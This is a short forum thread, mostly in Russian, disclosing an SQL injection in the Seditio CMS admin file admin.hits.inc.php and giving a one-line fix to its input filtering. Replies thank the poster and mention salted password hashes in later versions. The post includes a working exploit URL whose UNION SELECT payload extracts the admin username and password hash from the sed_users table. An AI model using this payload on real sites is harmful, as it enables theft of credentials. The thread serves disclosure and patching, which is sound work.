SQL Injection в admin.hits.inc.php

Уязвимость найдена в admin.hits.inc.php
Author
Message

Уязвимость найдена в admin.hits.inc.php, основана на недостаточной обработки переменных $v и $f

Данной дыркой могут воспользоваться только привиллигированные пользователи, имеющие доступ к панели администрирования. Уязвимость найдена во всех версиях Seditio (начиная 100 и заканчивая 170beta)

Пример эксплоита:

http://название_сайта/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed_users%20where%20user_id=1--%20or%271%27!=%271--

Метод устранения:

В admin.hits.inc.php найти:

$f = sed_import('f','G','TXT');
$v = sed_import('v','G','TXT');

и заменить на

$f = sed_import('f','G','ALP',10);
$v = sed_import('v','G','TXT',8);

Forever unshaven, red-eyed, detached from reality, with his cockroaches in my head. And let it always will be!

Thank you amro Wink

LDU & Seditio & Cotonti 

Starting with the 172 version, with the use of salt to encrypt the password decryption, even with knowledge of the password hash and salt itself is reduced to almost 0.

Forever unshaven, red-eyed, detached from reality, with his cockroaches in my head. And let it always will be!